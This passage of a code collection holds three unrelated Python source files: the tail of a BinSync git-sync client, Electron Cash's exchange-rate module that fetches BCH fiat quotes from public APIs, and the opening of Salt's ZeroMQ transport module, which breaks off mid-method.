metadata = State.load_metadata(ref.commit.tree)
yield User.from_metadata(metadata)
except Exception as e:
continue
def tally(self, users=None):
"""
Return a dict of user names and what information they can provide, e.g.,
{"user":
{
"functions": [0x400080],
}
}
:param list users: A list of user names, or None to include all users.
:return: A dict with tally information.
:rtype: dict
"""
if users is not None:
users = set(users)
else:
users = [x.name for x in self.users()]
all_info = {}
for user in self.users():
if user is None or user.name not in users:
continue
# what information does this user provide?
info = {}
state = self.get_state(user=user.name)
info["function"] = list(state.functions.keys())
#info["comments"] = list(state.comments.keys())
info["patches"] = list(
{"obj_name": p.obj_name, "offset": p.offset}
for p in state.patches.values()
)
all_info[user.name] = info
return all_info
def status(self):
"""
Return a dict of status information.
"""
d = {}
d['remote_name'] = self.remote
if self.repo is not None:
d['last_commit_hash'] = self.repo.heads[0].commit.hexsha
try:
d['last_commit_time'] = self.repo.heads[0].commit.committed_datetime.replace(tzinfo=None)
except IOError: # sometimes GitPython throws this exception
d['last_commit_time'] = "<unknown>"
if any(r.name == self.remote for r in self.repo.remotes):
d['remote_url'] = ";".join(self.repo.remotes[self.remote].urls)
else:
d['remote_url'] = "<does not exist>"
d['last_change'] = self._last_push_at if self._last_push_at is not None else "never"
d['last_push_attempt'] = self.last_push_attempt_at if self.last_push_attempt_at is not None else "never"
d['last_pull'] = self._last_pull_at if self._last_pull_at is not None else "never"
d['last_pull_attempt'] = self.last_pull_attempt_at if self.last_pull_attempt_at is not None else "never"
return d
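# Illustrative example of the returned dict (values below are hypothetical and
# shown only to document the shape of the status information):
#
#     {'remote_name': 'origin',
#      'last_commit_hash': '3f2a...e1',
#      'last_commit_time': datetime.datetime(2021, 6, 1, 12, 0),
#      'remote_url': 'git@example.com:team/binsync-repo.git',
#      'last_change': 'never', 'last_push_attempt': 'never',
#      'last_pull': 'never', 'last_pull_attempt': 'never'}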
def state_ctx(self, user=None, version=None, locked=False):
state = self.get_state(user=user, version=version)
return StateContext(self, state, locked=locked)
def get_tree(self, user):
with self.commit_lock:
options = [ref for ref in self.repo.refs if ref.name.endswith(f"{BINSYNC_BRANCH_PREFIX}/{user}")]
if not options:
raise ValueError(f'No such user "{user}" found in repository')
# find the latest commit for the specified user!
best = max(options, key=lambda ref: ref.commit.authored_date)
bct = best.commit.tree
return bct
def get_state(self, user=None, version=None):
if user is None or user == self.master_user:
# local state
if self.state is None:
try:
self.state = State.parse(
self.get_tree(user=self.master_user), version=version,
client=self,
) # TODO: do we also need to handle the case where user is None here?
except MetadataNotFoundError:
# we should return a new state
self.state = State(user if user is not None else self.master_user, client=self)
return self.state
else:
try:
state = State.parse(self.get_tree(user=user), version=version, client=self)
return state
except MetadataNotFoundError:
return None
def get_locked_state(self, user=None, version=None):
with self.commit_lock:
yield self.get_state(user=user, version=version)
def start_updater_thread(self):
if self._updater_thread is None:
self._updater_thread = threading.Thread(target=self._updater_routine)
self._updater_thread.start()
else:
raise Exception(
"start_updater_thread() should not be called twice. There is already a worker thread running."
)
def _updater_routine(self):
while True:
time.sleep(self._commit_interval)
self.update()
def update(self):
"""
Update both the local and remote repos: pull from the remote, commit any dirty
local state, and push the result back.
"""
# do a pull if there is a remote repo connected
if self.has_remote:
self.pull()
# attempt to commit dirty files during the update phase
if self.get_state().dirty:
self.commit_state()
if self.has_remote:
self.push()
self._last_commit_ts = time.time()
def commit_state(self, state=None, msg="Generic Change"):
with self.commit_lock:
self.checkout_to_master_user()
if state is None:
state = self.state
if self.master_user != state.user:
raise ExternalUserCommitError(f"User {self.master_user} is not allowed to commit to user {state.user}")
assert self.master_user == state.user
master_user_branch = next(o for o in self.repo.branches if o.name == self.user_branch_name)
index = self.repo.index
# dump the state
state.dump(index)
# commit changes
self.repo.index.add([os.path.join(state.user, "*")])
if not self.repo.index.diff("HEAD"):
return
# commit if there is any difference
try:
commit = index.commit(msg)
except Exception:
print("[BinSync]: Internal Git Commit Error!")
return
master_user_branch.commit = commit
state._dirty = False
self.push()
def sync_states(self, user=None):
target_state = self.get_state(user)
if target_state is None:
print("Unable to find state for user", user)
return
my_state = self.get_state(self.master_user)
my_state.copy_state(target_state)
self.commit_state()
@staticmethod
def discover_ssh_agent(ssh_agent_cmd):
proc = subprocess.Popen(ssh_agent_cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = proc.communicate()
stdout = stdout.decode("utf-8")
stderr = stderr.decode("utf-8")
if proc.returncode != 0 or stderr:
raise RuntimeError("Failed to discover SSH agent by running command %s.\n"
"Return code: %d.\n"
"stderr: %s" % (
ssh_agent_cmd,
proc.returncode,
stderr,
))
# parse output
m = re.search(r"Found ssh-agent at (\d+)", stdout)
if m is None:
print("Failed to find 'Found ssh-agent at'")
m = re.search(r"SSH_AGENT_PID=(\d+);", stdout)
if m is None:
print("Failed to find SSH_AGENT_PID")
return None, None
print("Found SSH_AGENT_PID")
ssh_agent_pid = int(m.group(1))
m = re.search("SSH_AUTH_SOCK=(.*?);", stdout)
if m is None:
print("Failed to find SSH_AUTH_SOCK")
return None, None
print("Found SSH_AGENT_SOCK")
ssh_agent_sock = m.group(1)
else:
print("Found ssh-agent at")
ssh_agent_pid = int(m.group(1))
m = re.search(r"Found ssh-agent socket at ([^\s]+)", stdout)
if m is None:
print("Failed to find 'Found ssh-agent socket at'")
return None, None
print("Found ssh-agent socket at")
ssh_agent_sock = m.group(1)
return ssh_agent_pid, ssh_agent_sock
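# Illustrative note (sketch, not from the original source): the parsing above
# handles two ssh-agent output styles. One is a wrapper-style report such as
#
#     Found ssh-agent at 1234
#     Found ssh-agent socket at /tmp/ssh-XXXXXX/agent.1234
#
# and the other is the standard `ssh-agent -s` shell output, e.g.
#
#     SSH_AUTH_SOCK=/tmp/ssh-XXXXXX/agent.1234; export SSH_AUTH_SOCK;
#     SSH_AGENT_PID=1234; export SSH_AGENT_PID;
#
# Both would yield (1234, '/tmp/ssh-XXXXXX/agent.1234'); on a parse failure the
# method returns (None, None).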
def close(self):
self.repo.close()
del self.repo
def _get_best_refs(self):
candidates = {}
for ref in self.repo.refs: # type: git.Reference
if f'{BINSYNC_BRANCH_PREFIX}/' not in ref.name:
continue
branch_name = ref.name.split("/")[-1]
if branch_name in candidates:
# a candidate already exists; only replace it with a remote ref from our configured remote
if not ref.is_remote() or ref.remote_name != self.remote:
continue
candidates[branch_name] = ref
return candidates.values()
def _setup_repo(self):
with open(os.path.join(self.repo_root, ".gitignore"), "w") as f:
f.write(".git/*\n")
with open(os.path.join(self.repo_root, "binary_hash"), "w") as f:
f.write(self.binary_hash)
self.repo.index.add([".gitignore", "binary_hash"])
self.repo.index.commit("Root commit")
self.repo.create_head(BINSYNC_ROOT_BRANCH)
def _get_stored_hash(self):
branch = [ref for ref in self.repo.refs if ref.name.endswith(BINSYNC_ROOT_BRANCH)][0]
return branch.commit.tree["binary_hash"].data_stream.read().decode().strip("\n")
|
exchange_rate.py
|
from datetime import datetime
import inspect
import requests
import sys
import os
import json
import pkgutil
from threading import Thread
import time
import csv
import decimal
from decimal import Decimal as PyDecimal # Qt 5.12 also exports Decimal
from collections import defaultdict
from . import networks
from .bitcoin import COIN
from .i18n import _
from .util import PrintError, ThreadJob, print_error, inv_base_units
DEFAULT_ENABLED = True
DEFAULT_CURRENCY = "USD"
DEFAULT_EXCHANGE = "CoinGecko" # Note the exchange here should ideally also support history rates
# See https://en.wikipedia.org/wiki/ISO_4217
CCY_PRECISIONS = {'BHD': 3, 'BIF': 0, 'BYR': 0, 'CLF': 4, 'CLP': 0,
'CVE': 0, 'DJF': 0, 'GNF': 0, 'IQD': 3, 'ISK': 0,
'JOD': 3, 'JPY': 0, 'KMF': 0, 'KRW': 0, 'KWD': 3,
'LYD': 3, 'MGA': 1, 'MRO': 1, 'OMR': 3, 'PYG': 0,
'RWF': 0, 'TND': 3, 'UGX': 0, 'UYI': 0, 'VND': 0,
'VUV': 0, 'XAF': 0, 'XAU': 4, 'XOF': 0, 'XPF': 0}
class ExchangeBase(PrintError):
def __init__(self, on_quotes, on_history):
self.history = {}
self.history_timestamps = defaultdict(float)
self.quotes = {}
self.on_quotes = on_quotes
self.on_history = on_history
def get_json(self, site, get_string):
# APIs must be accessed over HTTPS
url = ''.join(['https://', site, get_string])
response = requests.request('GET', url, headers={'User-Agent' : 'Electron Cash'}, timeout=10)
if response.status_code != 200:
raise RuntimeWarning("Response status: " + str(response.status_code))
return response.json()
def get_csv(self, site, get_string):
url = ''.join(['https://', site, get_string])
response = requests.request('GET', url, headers={'User-Agent' : 'Electron-Cash'})
if response.status_code != 200:
raise RuntimeWarning("Response status: " + str(response.status_code))
reader = csv.DictReader(response.content.decode().split('\n'))
return list(reader)
def name(self):
return self.__class__.__name__
def update_safe(self, ccy):
try:
self.print_error("getting fx quotes for", ccy)
self.quotes = self.get_rates(ccy)
self.print_error("received fx quotes")
except Exception as e:
self.print_error("failed fx quotes:", e)
self.on_quotes()
def update(self, ccy):
t = Thread(target=self.update_safe, args=(ccy,), daemon=True)
t.start()
def read_historical_rates(self, ccy, cache_dir):
filename = self._get_cache_filename(ccy, cache_dir)
h, timestamp = None, 0.0
if os.path.exists(filename):
timestamp = os.stat(filename).st_mtime
try:
with open(filename, 'r', encoding='utf-8') as f:
h = json.loads(f.read())
if h:
self.print_error("read_historical_rates: returning cached history from", filename)
except Exception as e:
self.print_error("read_historical_rates: error", repr(e))
h = h or None
return h, timestamp
def _get_cache_filename(self, ccy, cache_dir):
return os.path.join(cache_dir, self.name() + '_' + ccy)
@staticmethod
def _is_timestamp_old(timestamp):
HOUR = 60.0*60.0 # number of seconds in an hour
return time.time() - timestamp >= 24.0 * HOUR # check history rates every 24 hours, as the granularity is per-day anyway
def is_historical_rate_old(self, ccy):
return self._is_timestamp_old(self.history_timestamps.get(ccy, 0.0))
def _cache_historical_rates(self, h, ccy, cache_dir):
''' Writes the history, h, to the cache file. Catches its own exceptions and
never raises; returns True on success and False if the write failed. '''
wroteBytes, filename = 0, '(none)'
try:
filename = self._get_cache_filename(ccy, cache_dir)
with open(filename, 'w', encoding='utf-8') as f:
f.write(json.dumps(h))
wroteBytes = os.stat(filename).st_size
except Exception as e:
self.print_error("cache_historical_rates error:", repr(e))
return False
self.print_error(f"cache_historical_rates: wrote {wroteBytes} bytes to file {filename}")
return True
def get_historical_rates_safe(self, ccy, cache_dir):
h, timestamp = self.read_historical_rates(ccy, cache_dir)
if not h or self._is_timestamp_old(timestamp):
try:
self.print_error("requesting fx history for", ccy)
h = self.request_history(ccy)
self.print_error("received fx history for", ccy)
if not h:
# Paranoia: No data; abort early rather than write out an
# empty file
raise RuntimeWarning(f"received empty history for {ccy}")
self._cache_historical_rates(h, ccy, cache_dir)
except Exception as e:
self.print_error("failed fx history:", repr(e))
return
self.print_error("received history rates of length", len(h))
self.history[ccy] = h
self.history_timestamps[ccy] = timestamp
self.on_history()
def get_historical_rates(self, ccy, cache_dir):
result, timestamp = self.history.get(ccy), self.history_timestamps.get(ccy, 0.0)
if (not result or self._is_timestamp_old(timestamp)) and ccy in self.history_ccys():
t = Thread(target=self.get_historical_rates_safe, args=(ccy, cache_dir), daemon=True)
t.start()
return result
def history_ccys(self):
return []
def historical_rate(self, ccy, d_t):
return self.history.get(ccy, {}).get(d_t.strftime('%Y-%m-%d'))
def get_currencies(self):
rates = self.get_rates('')
return sorted([str(a) for (a, b) in rates.items() if b is not None and len(a)==3])
class BitcoinAverage(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('apiv2.bitcoinaverage.com', '/indices/global/ticker/short')
return dict([(r.replace("BCH", ""), PyDecimal(json[r]['last']))
for r in json if r != 'timestamp'])
# note: historical rates used to be freely available
# but this is no longer the case. see spesmilo#5188
# (Turned off until the unlikely event that the situation changes.)
#def history_ccys(self):
# return ['AUD', 'BRL', 'CAD', 'CHF', 'CNY', 'EUR', 'GBP', 'IDR', 'ILS',
# 'MXN', 'NOK', 'NZD', 'PLN', 'RON', 'RUB', 'SEK', 'SGD', 'USD',
# 'ZAR']
#
#def request_history(self, ccy):
# history = self.get_csv('apiv2.bitcoinaverage.com',
# "/indices/global/history/BCH%s?period=alltime&format=csv" % ccy)
# return dict([(h['DateTime'][:10], h['Average'])
# for h in history])
class BitPay(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('bitpay.com', '/rates/BCH')
return dict([(r['code'], PyDecimal(r['rate'])) for r in json['data']])
class Bitso(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('api.bitso.com', '/v2/ticker/?book=bch_btc')
return {'BTC': PyDecimal(json['last'])}
class BitStamp(ExchangeBase):
def get_rates(self, ccy):
json_usd = self.get_json('www.bitstamp.net', '/api/v2/ticker/bchusd')
json_eur = self.get_json('www.bitstamp.net', '/api/v2/ticker/bcheur')
json_btc = self.get_json('www.bitstamp.net', '/api/v2/ticker/bchbtc')
return {
'USD': PyDecimal(json_usd['last']),
'EUR': PyDecimal(json_eur['last']),
'BTC': PyDecimal(json_btc['last'])}
class Coinbase(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('api.coinbase.com',
'/v2/exchange-rates?currency=BCH')
return {ccy: PyDecimal(rate) for (ccy, rate) in json["data"]["rates"].items()}
class Kraken(ExchangeBase):
def get_rates(self, ccy):
ccys = ['EUR', 'USD']
pairs = ['BCH%s' % c for c in ccys]
json = self.get_json('api.kraken.com',
'/0/public/Ticker?pair=%s' % ','.join(pairs))
return dict((k[-3:], PyDecimal(float(v['c'][0])))
for k, v in json['result'].items())
class CoinCap(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('api.coincap.io', '/v2/rates/bitcoin-cash/')
return {'USD': PyDecimal(json['data']['rateUsd'])}
def history_ccys(self):
return ['USD']
def request_history(self, ccy):
from datetime import datetime as dt
# Currently 2000 days is the maximum for a single API call; this will need to be
# revisited sometime before the year 2023...
history = self.get_json('api.coincap.io',
"/v2/assets/bitcoin-cash/history?interval=d1&limit=2000")
return dict([(dt.utcfromtimestamp(h['time']/1000).strftime('%Y-%m-%d'),
h['priceUsd'])
for h in history['data']])
class CoinGecko(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('api.coingecko.com', '/api/v3/coins/bitcoin-cash?localization=False&sparkline=false')
prices = json["market_data"]["current_price"]
return dict([(a[0].upper(),PyDecimal(a[1])) for a in prices.items()])
def history_ccys(self):
return ['AED', 'ARS', 'AUD', 'BDT', 'BHD', 'BMD', 'BRL', 'BTC',
'CAD', 'CHF', 'CLP', 'CNY', 'CZK', 'DKK', 'ETH', 'EUR',
'GBP', 'HKD', 'HUF', 'IDR', 'ILS', 'INR', 'JPY', 'KRW',
'KWD', 'LKR', 'LTC', 'MMK', 'MXN', 'MYR', 'NOK', 'NZD',
'PHP', 'PKR', 'PLN', 'RUB', 'SAR', 'SEK', 'SGD', 'THB',
'TRY', 'TWD', 'USD', 'VEF', 'VND', 'XAG', 'XAU', 'XDR',
'ZAR']
def request_history(self, ccy):
history = self.get_json('api.coingecko.com', '/api/v3/coins/bitcoin-cash/market_chart?vs_currency=%s&days=max' % ccy)
from datetime import datetime as dt
return dict([(dt.utcfromtimestamp(h[0]/1000).strftime('%Y-%m-%d'), h[1])
for h in history['prices']])
class BitstampYadio(ExchangeBase):
def get_rates(self, ccy):
json_usd = self.get_json('www.bitstamp.net', '/api/v2/ticker/bchusd')
json_ars = self.get_json('api.yadio.io', '/exrates/ARS')
return {'ARS': PyDecimal(json_usd['last']) / PyDecimal(json_ars['ARS']['USD'])}
def dictinvert(d):
inv = {}
for k, vlist in d.items():
for v in vlist:
keys = inv.setdefault(v, [])
keys.append(k)
return inv
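# Illustrative example (not from the original source): dictinvert maps each value
# back to the list of keys whose value-lists contained it, e.g.
#
#     dictinvert({'CoinGecko': ['USD', 'EUR'], 'CoinCap': ['USD']})
#     # -> {'USD': ['CoinGecko', 'CoinCap'], 'EUR': ['CoinGecko']}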
def get_exchanges_and_currencies():
try:
data = pkgutil.get_data(__name__, 'currencies.json')
return json.loads(data.decode('utf-8'))
except:
pass
path = os.path.join(os.path.dirname(__file__), 'currencies.json')
d = {}
is_exchange = lambda obj: (inspect.isclass(obj)
and issubclass(obj, ExchangeBase)
and obj != ExchangeBase)
exchanges = dict(inspect.getmembers(sys.modules[__name__], is_exchange))
for name, klass in exchanges.items():
exchange = klass(None, None)
try:
d[name] = exchange.get_currencies()
print_error(name, "ok")
except:
print_error(name, "error")
continue
with open(path, 'w', encoding='utf-8') as f:
f.write(json.dumps(d, indent=4, sort_keys=True))
return d
CURRENCIES = get_exchanges_and_currencies()
def get_exchanges_by_ccy(history=True):
if not history:
return dictinvert(CURRENCIES)
d = {}
exchanges = CURRENCIES.keys()
for name in exchanges:
try:
klass = globals()[name]
except KeyError:
# can happen if currencies.json is not in sync with this .py file, see #1559
continue
exchange = klass(None, None)
d[name] = exchange.history_ccys()
return dictinvert(d)
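# Illustrative note (not from the original source): with history=True the result
# maps each currency to the exchanges that can serve historical rates for it,
# e.g. 'USD' -> ['CoinCap', 'CoinGecko'] given the history_ccys() lists defined
# above (the exact order depends on the ordering of CURRENCIES).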
class FxThread(ThreadJob):
default_currency = DEFAULT_CURRENCY
default_exchange = DEFAULT_EXCHANGE
def __init__(self, config, network):
self.config = config
self.network = network
self.ccy = self.get_currency()
self.history_used_spot = False
self.ccy_combo = None
self.hist_checkbox = None
self.timeout = 0.0
self.cache_dir = os.path.join(config.path, 'cache')
self.set_exchange(self.config_exchange())
if not os.path.exists(self.cache_dir):
os.mkdir(self.cache_dir)
def get_currencies(self, h):
d = get_exchanges_by_ccy(h)
return sorted(d.keys())
def get_exchanges_by_ccy(self, ccy, h):
d = get_exchanges_by_ccy(h)
return d.get(ccy, [])
def ccy_amount_str(self, amount, commas, default_prec=2, is_diff=False):
prec = CCY_PRECISIONS.get(self.ccy, default_prec)
diff_str = ''
if is_diff:
diff_str = '+' if amount >= 0 else '-'
fmt_str = "%s{:%s.%df}" % (diff_str, "," if commas else "", max(0, prec))
try:
rounded_amount = round(amount, prec)
except decimal.InvalidOperation:
rounded_amount = amount
return fmt_str.format(rounded_amount)
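# Illustrative examples (sketch, not from the original source), assuming self.ccy
# is configured as shown:
#
#     ccy='USD' (precision 2): ccy_amount_str(PyDecimal('1234.5'), commas=True)  -> '1,234.50'
#     ccy='JPY' (precision 0): ccy_amount_str(PyDecimal('1234.56'), commas=True) -> '1,235'
#
# With is_diff=True a '+' or '-' prefix is prepended based on the sign of amount.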
def run(self):
"""This runs from the Network thread. It is invoked roughly every
100ms (see network.py), with actual work being done every 2.5 minutes."""
if self.is_enabled():
if self.timeout <= time.time():
self.exchange.update(self.ccy)
if (self.show_history()
and (self.timeout == 0 # forced update
# OR > 24 hours have expired
or self.exchange.is_historical_rate_old(self.ccy))):
# Update historical rates. Note this doesn't actually
# go out to the network unless cache file is missing
# and/or >= 24 hours have passed since last fetch.
self.exchange.get_historical_rates(self.ccy, self.cache_dir)
# And, finally, update self.timeout so we execute this branch
# every ~2.5 minutes
self.timeout = time.time() + 150
@staticmethod
def is_supported():
"""Fiat currency is only supported on BCH MainNet, for all other chains it is not supported."""
return not networks.net.TESTNET
def is_enabled(self):
return bool(self.is_supported() and self.config.get('use_exchange_rate', DEFAULT_ENABLED))
def set_enabled(self, b):
return self.config.set_key('use_exchange_rate', bool(b))
def get_history_config(self):
return bool(self.config.get('history_rates'))
def set_history_config(self, b):
self.config.set_key('history_rates', bool(b))
def get_fiat_address_config(self):
return bool(self.config.get('fiat_address'))
def set_fiat_address_config(self, b):
self.config.set_key('fiat_address', bool(b))
def get_currency(self):
"""Use when dynamic fetching is needed"""
return self.config.get("currency", self.default_currency)
def config_exchange(self):
"""Returns the currently-configured exchange."""
return self.config.get('use_exchange', self.default_exchange)
def show_history(self):
return self.is_enabled() and self.get_history_config() and self.ccy in self.exchange.history_ccys()
def set_currency(self, ccy):
self.ccy = ccy
if self.get_currency() != ccy:
self.config.set_key('currency', ccy, True)
self.timeout = 0 # Force update because self.ccy changes
self.on_quotes()
def set_exchange(self, name):
default_class = globals().get(self.default_exchange)
class_ = globals().get(name, default_class)
if self.config_exchange() != name:
self.config.set_key('use_exchange', name, True)
self.exchange = class_(self.on_quotes, self.on_history)
if self.get_history_config() and self.ccy not in self.exchange.history_ccys() and class_ != default_class:
# this exchange has no history for this ccy. Try the default exchange.
# If that also fails the user will be stuck in a strange UI
# situation where the checkbox is checked but they see no history
# Note this code is here to migrate users from previous history
# API exchanges in config that are no longer serving histories.
self.set_exchange(self.default_exchange)
return
self.print_error("using exchange", name)
# A new exchange means new fx quotes, initially empty.
# This forces a quote refresh, which will happen in the Network thread.
self.timeout = 0
def on_quotes(self):
if self.network:
self.network.trigger_callback('on_quotes')
def on_history(self):
if self.network:
self.network.trigger_callback('on_history')
def exchange_rate(self):
'''Returns None, or the exchange rate as a PyDecimal'''
rate = self.exchange.quotes.get(self.ccy)
if rate:
return PyDecimal(rate)
def format_amount_and_units(self, btc_balance, is_diff=False, commas=True):
amount_str = self.format_amount(btc_balance, is_diff=is_diff, commas=commas)
return '' if not amount_str else "%s %s" % (amount_str, self.ccy)
def format_amount(self, btc_balance, is_diff=False, commas=True):
rate = self.exchange_rate()
return ('' if rate is None
else self.value_str(btc_balance, rate, is_diff=is_diff, commas=commas))
def get_fiat_status_text(self, btc_balance, base_unit, decimal_point):
rate = self.exchange_rate()
default_prec = 2
if base_unit == inv_base_units.get(2): # if base_unit == 'bits', increase precision on fiat as bits is pretty tiny as of 2019
default_prec = 4
return _(" (No FX rate available)") if rate is None else " 1 %s~%s %s" % (base_unit,
self.value_str(COIN / (10**(8 - decimal_point)), rate, default_prec ), self.ccy )
def value_str(self, satoshis, rate, default_prec=2, is_diff=False, commas=True):
if satoshis is None: # Can happen with incomplete history
return _("Unknown")
if rate:
value = PyDecimal(satoshis) / COIN * PyDecimal(rate)
return "%s" % (self.ccy_amount_str(value, commas, default_prec, is_diff=is_diff))
return _("No data")
def fiat_to_amount(self, fiat):
rate = self.exchange_rate()
return (None if rate is None
else int(PyDecimal(fiat) / rate * COIN))
def history_rate(self, d_t):
rate = self.exchange.historical_rate(self.ccy, d_t)
# Frequently there is no rate for today, until tomorrow :)
# Use spot quotes in that case
if rate is None and (datetime.today().date() - d_t.date()).days <= 2:
rate = self.exchange.quotes.get(self.ccy)
self.history_used_spot = True
return PyDecimal(rate) if rate is not None else None
def historical_value_str(self, satoshis, d_t):
rate = self.history_rate(d_t)
return self.value_str(satoshis, rate)
def historical_value(self, satoshis, d_t):
rate = self.history_rate(d_t)
if rate:
return PyDecimal(satoshis) / COIN * PyDecimal(rate)
def timestamp_rate(self, timestamp):
from .util import timestamp_to_datetime
date = timestamp_to_datetime(timestamp)
return self.history_rate(date)
|
zeromq.py
|
# -*- coding: utf-8 -*-
'''
Zeromq transport classes
'''
# Import Python Libs
from __future__ import absolute_import, print_function, unicode_literals
import os
import sys
import copy
import errno
import signal
import hashlib
import logging
import weakref
from random import randint
# Import Salt Libs
import salt.auth
import salt.crypt
import salt.utils.event
import salt.utils.files
import salt.utils.minions
import salt.utils.process
import salt.utils.stringutils
import salt.utils.verify
import salt.utils.zeromq
import salt.payload
import salt.transport.client
import salt.transport.server
import salt.transport.mixins.auth
from salt.ext import six
from salt.exceptions import SaltReqTimeoutError
from salt.utils.zeromq import zmq, ZMQDefaultLoop, install_zmq, ZMQ_VERSION_INFO, LIBZMQ_VERSION_INFO
import zmq.error
import zmq.eventloop.ioloop
import zmq.eventloop.zmqstream
try:
import zmq.utils.monitor
HAS_ZMQ_MONITOR = True
except ImportError:
HAS_ZMQ_MONITOR = False
# Import Tornado Libs
import tornado
import tornado.gen
import tornado.concurrent
# Import third party libs
try:
from M2Crypto import RSA
HAS_M2 = True
except ImportError:
HAS_M2 = False
try:
from Cryptodome.Cipher import PKCS1_OAEP
except ImportError:
from Crypto.Cipher import PKCS1_OAEP
log = logging.getLogger(__name__)
def _get_master_uri(master_ip,
master_port,
source_ip=None,
source_port=None):
'''
Return the ZeroMQ URI to connect the Minion to the Master.
It supports different source IP / port, given the ZeroMQ syntax:
// Connecting using a IP address and bind to an IP address
rc = zmq_connect(socket, "tcp://192.168.1.17:5555;192.168.1.1:5555"); assert (rc == 0);
Source: http://api.zeromq.org/4-1:zmq-tcp
'''
if LIBZMQ_VERSION_INFO >= (4, 1, 6) and ZMQ_VERSION_INFO >= (16, 0, 1):
# The source:port syntax for ZeroMQ has been added in libzmq 4.1.6
# which is included in the pyzmq wheels starting with 16.0.1.
if source_ip or source_port:
if source_ip and source_port:
return 'tcp://{source_ip}:{source_port};{master_ip}:{master_port}'.format(
source_ip=source_ip, source_port=source_port,
master_ip=master_ip, master_port=master_port)
elif source_ip and not source_port:
return 'tcp://{source_ip}:0;{master_ip}:{master_port}'.format(
source_ip=source_ip,
master_ip=master_ip, master_port=master_port)
elif not source_ip and source_port:
return 'tcp://0.0.0.0:{source_port};{master_ip}:{master_port}'.format(
source_port=source_port,
master_ip=master_ip, master_port=master_port)
if source_ip or source_port:
log.warning('Unable to connect to the Master using a specific source IP / port')
log.warning('Consider upgrading to pyzmq >= 16.0.1 and libzmq >= 4.1.6')
return 'tcp://{master_ip}:{master_port}'.format(
master_ip=master_ip, master_port=master_port)
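# Illustrative examples (a sketch, not executed) of the URIs produced by
# _get_master_uri, assuming libzmq >= 4.1.6 and pyzmq >= 16.0.1 so that the
# 'source;destination' syntax is available:
#
#   _get_master_uri('10.0.0.1', 4506)
#       -> 'tcp://10.0.0.1:4506'
#   _get_master_uri('10.0.0.1', 4506, source_ip='10.0.0.2')
#       -> 'tcp://10.0.0.2:0;10.0.0.1:4506'
#   _get_master_uri('10.0.0.1', 4506, source_ip='10.0.0.2', source_port=4505)
#       -> 'tcp://10.0.0.2:4505;10.0.0.1:4506'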
class AsyncZeroMQReqChannel(salt.transport.client.ReqChannel):
'''
Encapsulate sending routines to ZeroMQ.
ZMQ Channels default to 'crypt=aes'
'''
# This class is only a singleton per minion/master pair
# mapping of io_loop -> {key -> channel}
instance_map = weakref.WeakKeyDictionary()
def __new__(cls, opts, **kwargs):
'''
Only create one instance of channel per __key()
'''
# do we have any mapping for this io_loop
io_loop = kwargs.get('io_loop')
if io_loop is None:
install_zmq()
io_loop = ZMQDefaultLoop.current()
if io_loop not in cls.instance_map:
cls.instance_map[io_loop] = weakref.WeakValueDictionary()
loop_instance_map = cls.instance_map[io_loop]
key = cls.__key(opts, **kwargs)
obj = loop_instance_map.get(key)
if obj is None:
log.debug('Initializing new AsyncZeroMQReqChannel for %s', key)
# we need to make a local variable for this, as we are going to store
# it in a WeakValueDictionary-- which will remove the item if no one
# references it-- this forces a reference while we return to the caller
obj = object.__new__(cls)
obj.__singleton_init__(opts, **kwargs)
loop_instance_map[key] = obj
log.trace('Inserted key into loop_instance_map id %s for key %s and process %s',
id(loop_instance_map), key, os.getpid())
else:
log.debug('Re-using AsyncZeroMQReqChannel for %s', key)
return obj
def __deepcopy__(self, memo):
cls = self.__class__
result = cls.__new__(cls, copy.deepcopy(self.opts, memo)) # pylint: disable=too-many-function-args
memo[id(self)] = result
for key in self.__dict__:
if key in ('_io_loop',):
continue
# The _io_loop has a thread Lock which will fail to be deep
# copied. Skip it because it will just be recreated on the
# new copy.
if key == 'message_client':
# Recreate the message client because it will fail to be deep
# copied. The reason is the same as the io_loop skip above.
setattr(result, key,
AsyncReqMessageClientPool(result.opts,
args=(result.opts, self.master_uri,),
kwargs={'io_loop': self._io_loop}))
continue
setattr(result, key, copy.deepcopy(self.__dict__[key], memo))
return result
@classmethod
def __key(cls, opts, **kwargs):
return (opts['pki_dir'], # where the keys are stored
opts['id'], # minion ID
kwargs.get('master_uri', opts.get('master_uri')), # master ID
kwargs.get('crypt', 'aes'), # TODO: use the same channel for crypt
)
# has to remain empty for singletons, since __init__ will *always* be called
def __init__(self, opts, **kwargs):
pass
# an init for the singleton instance to call
def __singleton_init__(self, opts, **kwargs):
self.opts = dict(opts)
self.ttype = 'zeromq'
# crypt defaults to 'aes'
self.crypt = kwargs.get('crypt', 'aes')
if 'master_uri' in kwargs:
self.opts['master_uri'] = kwargs['master_uri']
self._io_loop = kwargs.get('io_loop')
if self._io_loop is None:
install_zmq()
self._io_loop = ZMQDefaultLoop.current()
if self.crypt != 'clear':
            # we don't need to worry about auth as a kwarg, since it's a singleton
self.auth = salt.crypt.AsyncAuth(self.opts, io_loop=self._io_loop)
log.debug('Connecting the Minion to the Master URI (for the return server): %s', self.opts['master_uri'])
self.message_client = AsyncReqMessageClientPool(self.opts,
args=(self.opts, self.opts['master_uri'],),
kwargs={'io_loop': self._io_loop})
def __del__(self):
'''
Since the message_client creates sockets and assigns them to the IOLoop we have to
specifically destroy them, since we aren't the only ones with references to the FDs
'''
if hasattr(self, 'message_client'):
self.message_client.destroy()
else:
log.debug('No message_client attr for AsyncZeroMQReqChannel found. Not destroying sockets.')
@property
def master_uri(self):
if 'master_ip' in self.opts:
return _get_master_uri(self.opts['master_ip'],
self.opts['master_port'],
source_ip=self.opts.get('source_ip'),
source_port=self.opts.get('source_ret_port'))
return self.opts['master_uri']
def _package_load(self, load):
return {
'enc': self.crypt,
'load': load,
}
@tornado.gen.coroutine
def crypted_transfer_decode_dictentry(self, load, dictkey=None, tries=3, timeout=60):
if not self.auth.authenticated:
# Return control back to the caller, continue when authentication succeeds
yield self.auth.authenticate()
# Return control to the caller. When send() completes, resume by populating ret with the Future.result
ret = yield self.message_client.send(
self._package_load(self.auth.crypticle.dumps(load)),
timeout=timeout,
tries=tries,
)
key = self.auth.get_keys()
if 'key' not in ret:
# Reauth in the case our key is deleted on the master side.
yield self.auth.authenticate()
ret = yield self.message_client.send(
self._package_load(self.auth.crypticle.dumps(load)),
timeout=timeout,
tries=tries,
)
if HAS_M2:
